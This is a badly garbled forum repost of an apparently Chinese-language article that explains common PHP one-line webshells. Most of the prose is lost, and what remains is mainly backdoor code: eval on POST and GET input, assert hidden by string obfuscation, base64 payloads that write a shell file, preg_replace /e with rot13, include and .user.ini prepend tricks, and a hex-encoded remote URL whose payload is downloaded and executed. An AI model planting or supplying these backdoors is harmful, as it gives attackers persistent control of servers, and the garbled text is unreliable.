[448] 2015-01-05_一句话木马初级篇:常见PHP后门解析

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-16
2015-01-05_一句话木马初级篇:常见PHP后门解析 P H P B B Z h o u   A r k T e a m   2 0 1 5 - 0 1 - 0 5 W e b S h e l l a s p p h p W E B 使 使 访 a s p p h p ) P H P < ? p h p e v a l ( $ _ P O S T [ C M D ] ) ; ? >   < ? p h p e v a l ( $ _ G E T [ C M D ] ) ; ? > 1 P H P e v a l c o d e c o d e p h p 2 < ? p h p   $ a = " p h p i n f o ( ) " ;   e v a l ( " e c h o   $ a ;   " ) ;   ? >   e c h o   p h p i n f o < ? p h p $ x = $ _ G E T [ ' z ' ] ; @ e v a l ( " $ x ; " ) ; ? > e v a l + G E T P O S T e v a l G E T P O S T e v a l g e t $ a = s t r _ r e p l a c e ( x , " " , " a x s x x s x e x r x x t " ) ; $ a ( $ _ P O S T [ " c o d e " ] ) ; c o d e = f p u t s ( f o p e n ( b a s e 6 4 _ d e c o d e ( J 2 M u c G h w J w = = ) , w ) , b a s e 6 4 _ d e c o d e ( " P D 9 w a H A g Q G V 2 Y W w o J F 9 Q T 1 N U W 2 F d K T s / P g = = " ) ) a s s e r t f p u t s ( f o p e n ( ' c . p h p ' , w ) , " < ? p h p @ e v a l ( $ _ P O S T [ a ] ) ; ? > " ) a s s e r t $ _ G E T [ ' a ' ] ( $ _ G E T [ ' b ' ] ) ; a = a s s e r t & b = f p u t s ( f o p e n ( b a s e 6 4 _ d e c o d e ( J 2 M u c G h w J w = = ) , w ) , b a s e 6 4 _ d e c o d e ( " P D 9 w a H A g Q G V 2 Y W w o J F 9 Q T 1 N U W 2 F d K T s / P g = = " ) ) ( $ c o d e   =   $ _ P O S T [ ' c o d e ' ] )   & & @ p r e g _ r e p l a c e ( ' / a d / e ' , ' @ ' . s t r _ r o t 1 3 ( ' r i n y ' ) . ' ( $ c o d e ) ' ,   ' a d d ' )
e v a l s t r _ r o t 1 3 ( ' r i n y ' )   e   p r e g _ r e p l a c e 使 p h p 使 e v a l $ f i l e n a m e = $ _ G E T [ ' c o d e ' ] ; i n c l u d e   ( $ f i l e n a m e ) ; i n c l u d e p h p t x t p h p . u s e r . i n i a u t o _ p r e p e n d _ f i l e = c o d e . g i f c o d e . g i f p h p 使 p h p i f ( e m p t y ( $ _ S E S S I O N [ ' a p i ' ] ) ) $ _ S E S S I O N [ ' a p i ' ] = s u b s t r ( f i l e _ g e t _ c o n t e n t s ( s p r i n t f ( ' % s ? % s ' , p a c k ( " H * " , ' 6 8 7 4 7 4 7 0 3 a 2 f 2 f 3 7 7 3 6 8 6 5 6 c 6 c 2 e 6 7 6 f 6 f 6 7 6 c 6 5 6 3 6 f 6 4 6 5 2 e 6 3 6 f 6 d 2 f 7 3 7 6 6 e 2 f 6 d 6 1 6 b 6 5 2 e 6 a 7 0 6 7 ' ) , u n i q i d ( ) ) ) , 3 6 4 9 ) ; @ p r e g _ r e p l a c e ( " ~ ( . * ) ~ i e s " , g z u n c o m p r e s s ( $ _ S E S S I O N [ ' a p i ' ] ) , n u l l ) ; p a c k U R L f i l e _ g e t _ c o n t e n t s m a k e . j p g s u b s t r 3 6 4 9 g z u n c o m p r e s s 3 6 4 9 p r e g _ r e p l a c e e 便 G e t P H P U R L P o s t P H P m m ( B B Z h o u / A r k T e a m ) 1 .   A r k T e a m A r k T e a m 2 .   A r k T e a m A r k T e a m h t t p : / / w w w . w e i b o . c o m / a r k t e a m
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则